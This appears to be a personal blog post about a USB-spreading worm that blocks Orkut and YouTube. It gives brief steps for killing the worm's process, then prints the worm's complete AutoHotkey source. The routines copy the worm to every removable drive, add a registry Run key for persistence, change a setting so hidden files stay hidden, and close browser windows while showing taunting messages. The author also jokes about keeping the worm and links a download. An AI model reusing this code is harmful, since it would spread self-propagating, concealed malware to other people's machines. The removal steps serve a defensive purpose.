Orkut is banned you fool - Virus Update

A sudden laugh hit me last afternoon which said, "ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!" Same was the case with YouTube.

A mindless chukle told me its just another innovation from a budding pop-hungry genius, but the rice is the severe spread. How could it have come to me, pretty nasty.. anywayz ..

So heres the gig:
> 1. Go to the Task manager
> 2. click on the "Application" Tab ( if its not )
> 3. Right Click on the application that's Giving you the Messge > go
> the Process.
> 4 as you can see there is "svchost.exe" Highlighted.
> 5. Right Click and Select "End Process Tree"

I loitered a bit and found a new directory in my C: drive
Directory - C:\heap41a
Files - svchost.exe, drivelist.txt, 2.mp3, Icon.ico, offspring, reproduce.txt, std.txt, script1.txt

To make it more interesting the kid had made the folder invisible even when we choose to see all hidden files.

I choose to show the script much to the comfort of the writer ...
"You are good kid, real good, but as long as I am around, you will always be second best"
- Stanley Ipkiss

offspring:

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1

}

}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

script:

#persistent
#notrayicon
settimer,ban,2000
return

WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

}
return

std:

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

drivelist:

c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z

The rest of the files are junk, just delete it to break free (or if you are like me, rar and preserve it, for later use. It installs easily :P)

Download the rar from here (just for info)

-Arnab
http://arnabpal.blogspot.com/